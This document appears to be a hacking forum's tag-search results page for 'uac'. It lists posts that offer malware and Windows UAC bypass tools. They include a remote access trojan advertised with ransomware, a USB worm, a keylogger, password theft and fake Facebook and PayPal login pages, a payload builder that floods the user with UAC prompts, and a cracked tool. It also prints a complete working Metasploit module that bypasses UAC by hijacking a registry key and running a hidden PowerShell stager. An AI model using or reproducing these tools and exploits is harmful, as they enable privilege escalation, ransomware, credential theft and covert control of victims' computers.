Showing results for tags 'uac'.

Found 13 results

  1. ForceAdmin is a C# payload builder, creating infinite UAC pop-ups until the user allows the program to be run. The inputted commands are run via PowerShell calling cmd.exe and should be using the batch syntax. Why use? Well, some users have UAC set to always show, so UAC bypass techniques are not possible. However, this attack will force them to run as admin. Bypassing these settings [Hidden Content]
  2. Verci Spy System RAT | Ransomware | NSA Exploits | UAC | Spread

     Verci Spy System OR Verci_Spy_System

     This tool was designed by us. This tool is a Remote Access Trojan with which you can take any Windows machine under your control and do many things within that infected PC. The infected PC will also have a virus that spreads rapidly through USB sticks and infects other safe PCs too, by inserting the USB stick into them and clicking any of the shortcuts, and so on. The tool was designed for some educational purposes and some testing of PC security, and we are not responsible for any illegal use of it. This tool was also designed for better hacking visual effects that can give you the feeling of a real hacker; you can use it in hacking movies, and it has some animations and a localization map for detecting victims all over the world. Verci wasn't cracked after its trial version was released, but the installer wasn't cracked before, also our XPR Tool, but we will not make the same mistake and will not release any trial version for free.

     These are the program options that you can use with the infected PC once you have taken control of it:

     1-UAC (User Access Control) Manager (Enable or Disable)
     2-Open remote Webcam / Microphone
     3-Control Remote Desktop
     4-File Manager Controller
     5-Process Manager
     6-Regedit Controller
     7-Services Manager
     8-Devices & Printers Viewer
     9-Active Windows Manager
     10-View Remote WiFi Networks
     11-View Saved WiFi Passwords
     12-Ransomwares [You Have 2 Ransomwares] (Try any one you wish)
     13-WiFi Hotspot Creator [Use any other device to check the Hotspot]
     14-Lan Computer Manager [Lan Spread (Premium Only)]
     15-Network Connections/Drivers Manager
     16-Scan Remote websites ports
     17-Scan Lan network devices ports
     18-Manage installed Programs
     19-Unmovable chat system
     20-Clipboard Manager [Images & Text] (Set & Get Clipboard)
     21-Remote Command prompt
     22-Code Compiler
     23-Saved Password Stealer (Updated)
     24-Remote Keylogger (Offline/Online)
     25-DDOS Attack Manager / Http Flooder
     26-Full Computer information Manager
     27-(Installed Python Scripts)
        a) This option allows you to install the Sqlmap script on the client PC and hack any infected sites using it. This way the client PC will be saved in the site logs, not your PC
     28-Run File (From Disk/Url)
     29-Open Url (Default Browser) [Or] (Any Browser)
     30-Automatic Victim Transfer Option [Transfer to any host or external IP]
     31-NoIP Updater
     32-Ransomware Builder [Build own Ransomware with your own Bitcoin]
     33-Notify With Client Webcam image
     34-Spam options:
        a) You can open a fake Facebook login page on the client PC and grab passwords in the keylogger
        b) You can open a fake Paypal login page on the client PC and grab passwords in the keylogger
        c) You can open a fake Visa card number confirmation page on the client PC and grab information in the keylogger
     36-Auto Share Client Drivers over Lan

     Ransomware Builder Manager: this is the scheme of the ransomware

     *) Generate a random password of 15 randomly chosen characters
     *) Start encrypting all files that exist in the user directory using the password
     *) Kills explorer.exe
     *) Kills Microsoft.Exchange
     *) Kills MSExchange
     *) Kills sqlserver.exe
     *) Kills sqlwriter.exe
     *) Kills mysqld.exe
     *) Delete all Shadow copies
     *) Usb spread (shortcut) [.lnk]
     *) Keep looping to encrypt all files that exist in other drives using the password

     Available Trojans: 2 Trojans - 2 Downloaders:

     a) Full Control (Size: 400 Kilobytes)
     b) Worm Control (Size: 170 Kilobytes)
     c) .exe Downloader (Size: 11 Kilobytes)
     d) .vbs Downloader (Size: 909 Bytes)

     Preview Image 1: You can now enter a free port you choose manually and click Ok
     Preview Image 2: Fast look. To exit fullscreen press "Click To Restore"

     Downloads: [Hidden Content]
  3. UAC Escaper v0.1 This is an old method to bypass UAC. I created this simple builder to make it easy to compile without the need for IDE. Just drop and drag your file to make it bypass UAC. Tested on win7 64bit SP1 + win10 64bit "latest version" [Hidden Content]
  4. Windows 10 LPE (UAC Bypass) in Windows Store (WSReset.exe) Metasploit Module [Hidden Content] Powershell Code [Hidden Content] Code in C [Hidden Content]
  5. This Metasploit module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool is run with the "autoElevate" property set to true, however it can be moved to a new Windows directory containing a space (C:\Windows \System32\) where, upon execution, it will load our payload dll (propsys.dll). View the full article
  6. This Metasploit module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the binary as a privileged user. View the full article
  7. There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. View the full article
  8. This script is a proof of concept to bypass the Microsoft Windows User Access Control (UAC) via SluiFileHandlerHijackLPE. View the full article
  9. ##
     # This module requires Metasploit: [Hidden Content]
     # Current source: [Hidden Content]
     ##

     require 'msf/core/exploit/exe'
     require 'msf/core/exploit/powershell'

     class MetasploitModule < Msf::Exploit::Local
       Rank = ExcellentRanking

       include Exploit::Powershell
       include Post::Windows::Priv
       include Post::Windows::Registry
       include Post::Windows::Runas

       COMPUTERDEFAULT_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
       COMPUTERDEFAULT_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
       EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
       EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
       EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
       COMPUTERDEFAULT_PATH = "%WINDIR%\\System32\\computerdefault.exe".freeze
       CMD_MAX_LEN = 16383

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'Windows UAC Protection Bypass (Via ComputerDefault Registry Key)',
             'Description' => %q{
               This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
               the current user hive, and inserting a custom command that will get invoked when the
               Windows computerdefault.exe application is launched. It will spawn a second shell that has the UAC
               flag turned off.

               This module modifies a registry key, but cleans up the key once the payload has
               been invoked.

               The module does not require the architecture of the payload to match the OS. If
               specifying EXE::Custom your DLL should call ExitProcess() after starting your
               payload in a separate process.
             },
             'License' => MSF_LICENSE,
             'Author' => [
               'St0rn - Synetis.com', # UAC bypass discovery and research
               'St0rn - [email protected]', # MSF module
             ],
             'Platform' => ['win'],
             'SessionTypes' => ['meterpreter'],
             'Targets' => [
               [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
               [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
             ],
             'DefaultTarget' => 0,
             'References' => [
               [ 'URL', '[Hidden Content]' ]
             ],
             'DisclosureDate' => 'October 22 2018'
           )
         )
       end

       def check
         if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
           Exploit::CheckCode::Appears
         else
           Exploit::CheckCode::Safe
         end
       end

       def exploit
         commspec = '%COMSPEC%'
         registry_view = REGISTRY_VIEW_NATIVE
         psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"

         # Make sure we have a sane payload configuration
         if sysinfo['Architecture'] == ARCH_X64
           if session.arch == ARCH_X86
             # fodhelper.exe is x64 only exe
             commspec = '%WINDIR%\\Sysnative\\cmd.exe'
             if target_arch.first == ARCH_X64
               # We can't use absolute path here as
               # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
               psh_path = "powershell.exe"
             end
           end
           if target_arch.first == ARCH_X86
             # Invoking x86, so switch to SysWOW64
             psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
           end
         else
           # if we're on x86, we can't handle x64 payloads
           if target_arch.first == ARCH_X64
             fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
           end
         end

         if !payload.arch.empty? && (payload.arch.first != target_arch.first)
           fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
         end

         # Validate that we can actually do things before we bother
         # doing any more work
         check_permissions!

         case get_uac_level
         when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
              UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
              UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
           fail_with(Failure::NotVulnerable,
                     "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
         when UAC_DEFAULT
           print_good('UAC is set to Default')
           print_good('BypassUAC can bypass this setting, continuing...')
         when UAC_NO_PROMPT
           print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
           shell_execute_exe
           return
         end

         payload_value = rand_text_alpha(8)
         psh_path = expand_path(psh_path)

         template_path = Rex::Powershell::Templates::TEMPLATE_DIR
         psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)

         if psh_payload.length > CMD_MAX_LEN
           fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
         end

         psh_stager = "\"IEX (Get-ItemProperty -Path #{COMPUTERDEFAULT_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
         cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

         existing = registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
         exist_delegate = !registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?

         if existing.empty?
           registry_createkey(COMPUTERDEFAULT_WRITE_KEY, registry_view)
         end

         print_status("Configuring payload and stager registry keys ...")
         unless exist_delegate
           registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
         end

         registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
         registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

         # Calling fodhelper.exe through cmd.exe allows us to launch it from either x86 or x64 session arch.
         cmd_path = expand_path(commspec)
         cmd_args = expand_path("/c #{COMPUTERDEFAULT_PATH}")
         print_status("Executing payload: #{cmd_path} #{cmd_args}")

         # We can't use cmd_exec here because it blocks, waiting for a result.
         client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })

         # Wait a couple of seconds to give the payload a chance to fire before cleaning up
         # TODO: fix this up to use something smarter than a timeout?
         Rex::sleep(5)

         handler(client)

         print_status("Cleaining up registry keys ...")
         unless exist_delegate
           registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
         end
         if existing.empty?
           registry_deletekey(COMPUTERDEFAULT_DEL_KEY, registry_view)
         else
           registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
         end
         registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, payload_value, registry_view)
       end

       def check_permissions!
         fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

         # Check if you are an admin
         vprint_status('Checking admin status...')
         admin_group = is_in_admin_group?

         unless check == Exploit::CheckCode::Appears
           fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
         end

         unless is_in_admin_group?
           fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
         end

         print_status('UAC is Enabled, checking level...')
         if admin_group.nil?
           print_error('Either whoami is not there or failed to execute')
           print_error('Continuing under assumption you already checked...')
         else
           if admin_group
             print_good('Part of Administrators group! Continuing...')
           else
             fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
           end
         end

         if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
           fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
         end
       end
     end
  10. This Metasploit module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. View the full article
  11. This exploit permits an attacker to bypass UAC by hijacking a registry key during computerSecurity.exe (auto elevate windows binary) execution. View the full article
  12. Full credit to original cracker (kalipo). It's another hf product... just posting for anyone who wishes to use it. SALES THREAD: Mirror: [Hidden Content]